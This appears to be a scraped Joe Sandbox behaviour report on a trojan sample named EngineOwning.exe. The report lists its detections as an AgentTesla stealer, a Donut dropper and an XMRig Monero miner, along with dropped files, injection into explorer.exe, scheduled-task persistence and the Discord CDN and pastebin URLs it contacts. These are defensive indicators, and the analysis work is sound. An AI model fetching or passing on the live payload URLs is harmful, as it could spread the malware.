Machine Learning detection for dropped file 48->101 103 Injects code into the Windows Explorer (explorer.exe) 48->103 105 5 other signatures 48->105 62 cmd.exe 48->62         started        65 conhost.exe 48->65         started        67 explorer.exe 48->67         started        signatures18 process19 signatures20 131 Encrypted powershell cmdline option found 62->131 69 conhost.exe 62->69         started        71 powershell.exe 62->71         started        73 conhost.exe 65->73         started        process21

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      EngineOwning.exe25%VirustotalBrowse
      EngineOwning.exe19%ReversingLabsWin64.Trojan.Convagent
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exe100%AviraHEUR/AGEN.1202861
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exe100%AviraTR/Dropper.Gen
      C:\Users\user\AppData\Roaming\Windows\services86.exe100%AviraTR/Dropper.Gen
      C:\ProgramData\winrsdhost.exe100%AviraTR/Dropper.Gen
      C:\ProgramData\mdsigstub.exe100%AviraHEUR/AGEN.1202861
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\Windows\services86.exe100%Joe Sandbox ML
      C:\ProgramData\winrsdhost.exe100%Joe Sandbox ML
      C:\ProgramData\mdsigstub.exe100%Joe Sandbox ML
      C:\ProgramData\mdsigstub.exe72%VirustotalBrowse
      C:\ProgramData\mdsigstub.exe34%MetadefenderBrowse
      C:\ProgramData\mdsigstub.exe77%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      C:\ProgramData\winrsdhost.exe25%VirustotalBrowse
      C:\ProgramData\winrsdhost.exe41%ReversingLabsByteCode-MSIL.Trojan.Donut
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exe72%VirustotalBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exe34%MetadefenderBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exe77%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exe41%ReversingLabsByteCode-MSIL.Trojan.Donut
      SourceDetectionScannerLabelLinkDownload
      29.0.services86.exe.ed0000.0.unpack100%AviraTR/Dropper.GenDownload File
      36.0.conhost.exe.400000.3.unpack100%AviraHEUR/AGEN.1205338Download File
      36.0.conhost.exe.400000.4.unpack100%AviraHEUR/AGEN.1205338Download File
      36.0.conhost.exe.400000.5.unpack100%AviraHEUR/AGEN.1205338Download File
      40.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1213073Download File
      36.0.conhost.exe.400000.0.unpack100%AviraHEUR/AGEN.1205338Download File
      7.2.mdsigstub.exe.2f0000.0.unpack100%AviraHEUR/AGEN.1202861Download File
      7.0.mdsigstub.exe.2f0000.0.unpack100%AviraHEUR/AGEN.1202861Download File
      40.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1213073Download File
      40.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1213073Download File
      40.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1213073Download File
      40.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1213073Download File
      40.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1213073Download File
      40.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1213073Download File
      36.0.conhost.exe.400000.1.unpack100%AviraHEUR/AGEN.1205338Download File
      36.0.conhost.exe.400000.7.unpack100%AviraHEUR/AGEN.1205338Download File
      40.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1213073Download File
      36.2.conhost.exe.400000.0.unpack100%AviraHEUR/AGEN.1205338Download File
      4.0.winrsdhost.exe.50000.0.unpack100%AviraTR/Dropper.GenDownload File
      36.0.conhost.exe.400000.2.unpack100%AviraHEUR/AGEN.1205338Download File
      7.0.mdsigstub.exe.2f0000.2.unpack100%AviraHEUR/AGEN.1202861Download File
      36.0.conhost.exe.400000.6.unpack100%AviraHEUR/AGEN.1205338Download File
      7.0.mdsigstub.exe.2f0000.1.unpack100%AviraHEUR/AGEN.1202861Download File
      40.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1213073Download File
      40.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1213073Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://go.microsoft.co0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://www.pango.co/privacy0%URL Reputationsafe
      https://displaycatalog.mcros0%URL Reputationsafe
      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://xmrig.com/wizard%s0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://crl.ver)0%Avira URL Cloudsafe
      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
      https://xmrig.com/wizard0%URL Reputationsafe
      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
      https://disneyplus.com/legal.0%URL Reputationsafe
      https://xmrig.com/docs/algorithms0%URL Reputationsafe
      https://xmrig.com/benchmark/%s0%URL Reputationsafe
      http://help.disneyplus.com.0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      cdn.discordapp.com
      162.159.129.233
      truefalse
        high
        xmr-eu1.nanopool.org
        51.15.54.102
        truefalse
          high
          pastebin.com
          172.67.34.170
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exefalse
              high
              https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exefalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exeiEngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeuRa:EngineOwning.exe, 00000000.00000000.491896440.0000018A25549000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440424276.0000018A25549000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://go.microsoft.copowershell.exe, 00000020.00000002.635758290.00000199FEC7B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000003.617080076.00000199FEC7B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.cloudflare.com/origin_ca.crl0explorer.exe, 00000028.00000002.702729290.0000000002E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.703290741.0000000002EEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701467589.0000000000AED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701574922.0000000000B08000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://cdn.discordapp.com/EngineOwning.exe, 00000000.00000000.491825437.0000018A25537000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440409971.0000018A25537000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://pastebin.com/raw/1FrcGRG9explorer.exe, 00000028.00000002.701030193.0000000000AB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://crl.cloudflare.com/origin_ca.crl3explorer.exe, 00000028.00000002.701547821.0000000000AFF000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://pastebin.com/raw/1FrcGRG9--cinit-stealth-targets=Taskmgr.exeexplorer.exe, 00000028.00000002.701030193.0000000000AB4000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exeLMEMEngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://cdn.discordapp.com/REngineOwning.exe, 00000000.00000000.491825437.0000018A25537000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440409971.0000018A25537000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exexEngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.529630634.0000018447E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.hotspotshield.com/terms/svchost.exe, 00000025.00000003.679779414.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.681191680.0000022983092000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679699802.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679750355.00000229830B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679730659.00000229830A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.pango.co/privacysvchost.exe, 00000025.00000003.679779414.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.681191680.0000022983092000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679699802.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679750355.00000229830B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679730659.00000229830A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://crl.cloudflare.com/origin_ca.crlexplorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://displaycatalog.mcrossvchost.exe, 00000025.00000002.702402998.00000229822C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewinrsdhost.exe, 00000004.00000002.564065301.000000000338E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.517135274.0000018437DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.618907768.00000199E6B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000025.00000003.684955440.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.685202986.0000022983092000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.529630634.0000018447E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.518394259.0000018437FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exe1EngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.cloudflare.com/origin_ca0explorer.exe, 00000028.00000002.702729290.0000000002E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.703290741.0000000002EEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701467589.0000000000AED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701547821.0000000000AFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.701574922.0000000000B08000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeQRM:EngineOwning.exe, 00000000.00000000.491896440.0000018A25549000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440424276.0000018A25549000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://xmrig.com/wizard%sservices86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://contoso.com/Iconpowershell.exe, 00000020.00000002.634888947.00000199F6BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeC:EngineOwning.exe, 00000000.00000000.489542532.0000018A254E9000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440520651.0000018A254E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.ver)svchost.exe, 0000000E.00000002.702957756.000002A17CA0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.702625959.00000229822EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000025.00000003.689083657.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.689013876.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.689063237.0000022983092000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.688988283.00000229830B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeTTC:EngineOwning.exe, 00000000.00000000.489542532.0000018A254E9000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440520651.0000018A254E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://xmrig.com/wizardservices86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://crl.cloudflare.com/origin_ca.crlhexplorer.exe, 00000028.00000002.701547821.0000000000AFF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeLMEMEngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.hotspotshield.com/svchost.exe, 00000025.00000003.679779414.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.681191680.0000022983092000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679699802.0000022982B03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679750355.00000229830B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.679730659.00000229830A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000025.00000003.684955440.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.685202986.0000022983092000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://pastebin.com/raw/gr9z66wsmdsigstub.exe, 00000007.00000002.533588737.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.discordapp.com/attachments/935712720827842614/966833215883067412/Client.exeaREngineOwning.exe, 00000000.00000000.491896440.0000018A25549000.00000004.00000020.00020000.00000000.sdmp, EngineOwning.exe, 00000000.00000003.440424276.0000018A25549000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cdn.discordapp.com/attachments/935712720827842614/968101824034898000/servicesx86.exeC:/ProgrEngineOwning.exe, 00000000.00000000.493154695.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmp, EngineOwning.exe, 00000000.00000000.429374377.00007FF75AF7F000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.518394259.0000018437FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.620169103.00000199E6D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://disneyplus.com/legal.svchost.exe, 00000025.00000003.684955440.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.685202986.0000022983092000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://xmrig.com/docs/algorithmsservices86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://ocsp.cloudflare.com/origin_caexplorer.exe, 00000028.00000002.702906688.0000000002E6A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://xmrig.com/benchmark/%sservices86.exe, 0000001D.00000003.661445568.000000001E2C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.675395172.0000000140000000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.685704029.0000000140000000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://help.disneyplus.com.svchost.exe, 00000025.00000003.684955440.00000229830A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.685202986.0000022983092000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              162.159.129.233
                                                                              cdn.discordapp.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              IP
                                                                              192.168.2.1
                                                                              127.0.0.1
                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                              Analysis ID:616095
                                                                              Start date and time: 26/04/202221:07:402022-04-26 21:07:40 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 12m 7s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:light
                                                                              Sample file name:EngineOwning.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:41
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.evad.mine.winEXE@45/25@3/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 66.7%
                                                                              HDC Information:
                                                                              • Successful, ratio: 69.4% (good quality ratio 41.8%)
                                                                              • Quality average: 36.4%
                                                                              • Quality standard deviation: 37.1%
                                                                              HCA Information:
                                                                              • Successful, ratio: 75%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe
                                                                              • TCP Packets have been reduced to 100
                                                                              • Excluded IPs from analysis (whitelisted): 104.79.90.110, 104.208.16.94, 52.168.117.173, 20.54.110.249
                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                              • Execution Graph export aborted for target mdsigstub.exe, PID 6436 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 6744 because it is empty
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                              TimeTypeDescription
                                                                              21:09:18API Interceptor71x Sleep call for process: powershell.exe modified
                                                                              21:09:23API Interceptor10x Sleep call for process: svchost.exe modified
                                                                              21:09:31API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                              21:09:42API Interceptor1x Sleep call for process: winrsdhost.exe modified
                                                                              21:09:46Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Users\user\AppData\Roaming\Windows\services86.exe
                                                                              21:10:31API Interceptor1x Sleep call for process: services86.exe modified
                                                                              21:10:37API Interceptor54x Sleep call for process: conhost.exe modified
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf5f81f35, page size 16384, DirtyShutdown, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):786432
                                                                              Entropy (8bit):0.25068727155460196
                                                                              Encrypted:false
                                                                              SSDEEP:384:s+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zSB2nSB2RSjlK/+mLesOj1J2
                                                                              MD5:CFEDE28E5931B3E82239FAE29238010C
                                                                              SHA1:7907C0919683D2821A6394376252626203DCA2E5
                                                                              SHA-256:4C61C8BA91936958C98DE9ADEB78BDDF6136849F4B9ACAC7EE0894E7150F8989
                                                                              SHA-512:9C0BE0A6250CEB64B38E50E8468C7ED381562D17FB4FCF9931D30556B54196389518DF1CE03B465A173D961EA71EA6D069C298ADB3CD5C71FE8F67D5346F8C82
                                                                              Malicious:false
                                                                              Preview:...5... ................e.f.3...w........................&..........w.......zc.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................R .....z.e..................6......z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.0548288092349611
                                                                              Encrypted:false
                                                                              SSDEEP:192:20azY3qOMHnsnvIYjTlcZd/u7saS274ltc305:Dc1nsn9jud/u7saX4ltv5
                                                                              MD5:0F0B8320F0C830D93884D3C070D50FE5
                                                                              SHA1:27FAFA4512306DFA5F2EDD50EB7E7B6655E9621D
                                                                              SHA-256:F6C39F9D2BBA55DE9259880D8A1FCF8136E4BB4D06FFBC27B69E31C1357BE0B4
                                                                              SHA-512:8E00415276A97221734E41956F4D56A77E837EB208901C37732CA4881284439B2C992DF7A2C84F238AEBBF29EA22CC1D6F93609B2626EC43948CD90B0488E298
                                                                              Malicious:true
